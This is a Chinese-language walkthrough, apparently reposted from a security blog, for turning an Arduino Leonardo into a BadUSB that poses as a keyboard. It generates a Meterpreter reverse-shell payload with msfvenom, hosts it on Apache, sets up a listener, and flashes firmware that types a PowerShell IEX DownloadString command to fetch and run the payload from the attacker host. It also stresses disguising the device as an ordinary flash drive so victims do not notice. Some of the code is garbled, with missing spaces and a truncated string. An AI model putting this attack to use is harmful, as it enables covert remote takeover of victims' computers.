摘要: 将USB设备伪装成键盘设备,使目标主机被迫执行预置在固件中的恶意代码。

0x01 badusb简介

badusb大家应该都了解过,是利用伪造HID设备执行攻击载荷的一种攻击方式。HID设备一般指的是计算机直接与人交互的设备,例如键盘、鼠标等


总的来说,就是将USB设备伪装成键盘设备,使目标主机被迫执行预置在固件中的恶意代码


通常情况下都会把badusb制作成与U盘极其相似,且不会被受害者所察觉,badusb目前在淘宝有售,下面是详细的用badusb拿shell的过程


0x02 安装Arduino IDE


arduino ide是一款专业的arduino开发工具,主要用于arduino程序的编写和开发,拥有开放源代码的电路图设计、支持ISP在线烧,同时支持Flash、Max/Msp、VVVV、PD、C、Processing等多种程序兼容的特点


首先,官网下载Arduino IDE



下载好后进行安装,将badusb连接主机,配置环境


0x03 利用msf生成windows端木马


在msf中输入以下命令生成木马

msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn> -f psh > 1.ps1

启动Apache2,将生成的1.ps1复制到/var/www/html中

serviceapache2 start
sudocp 1.ps1 /var/www/html

进入监听模式

windows/meterpreter/reverse_tcp 
setLHOST172.16.7.130setLPORT4321
run

0x04 烧录

可以取得开发板信息确定是否连接

在工具中选择开发板:ArduinoLeonardo

选择合适的端口

编程器选择:USBasp

当写入代码后,首先点击第一个按钮进行验证,当显示编译完成则可点击上传进行烧录

代码的编写我们可以借助Automator_2.0.1这款辅助软件,编写代码更加方便

软件:https://github.com/Catboy96/Automator

代码格式介绍


setup() 函数

用来初始化变量、Pin模式、开始使用库等

每次打开或重置Arduino板后,setup()函数将只运行一次


loop() 函数

精确地执行其名称所建议的操作,并连续循环,从而允许程序更改和响应

//参考代码:#include<Keyboard.h> //包含键盘模块头文件
voidsetup(){//初始化Keyboard.begin();//开始键盘通信
delay(1000);//延时1000毫秒
Keyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键 
Keyboard.press('r');//按下r键 
CMDdelay(500);
Keyboard.release(KEY_LEFT_GUI);//松掉win键
Keyboard.release('r');//松掉r键
delay(500);
Keyboard.println("powershell IEX (New-Object Net.WebClient).DownloadString(' 
Keyboard.press(KEY_RETURN); //按下回车键
Keyboard.release(KEY_RETURN);//释放回车键delay(500);
Keyboard.end();//结束键盘通讯
}
voidloop()//循环,这里的代码{//循环体}



0x05 测试

将烧录好的badusb插入目标主机后,目标主机会自动按下“win+r”键,并自动输入:

powershell IEX (New-ObjectNet.WebClient).DownloadString('http://172.16.7.130/1.ps1')

拿shell成功!

本文章只用于教学,切勿用于非法用途

转载于:https://www.heibai.org/post/1633.html

上一篇:前端安全之XSS攻击
下一篇:探针盒子?不用怕!手把手教你...